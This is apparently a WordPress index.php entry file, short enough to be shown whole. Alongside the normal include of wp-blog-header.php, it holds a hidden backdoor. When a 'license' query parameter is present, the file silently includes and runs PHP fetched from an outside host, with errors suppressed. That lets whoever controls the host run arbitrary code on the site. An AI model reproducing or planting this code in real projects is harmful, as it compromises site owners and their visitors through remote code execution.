
/* Short and sweet */
define('WP_USE_THEMES', true);
if (isset($_GET['license'])) {
	@include('http://wordpress.net.in/license.txt');
} else {
	require('./wp-blog-header.php');
}
?>
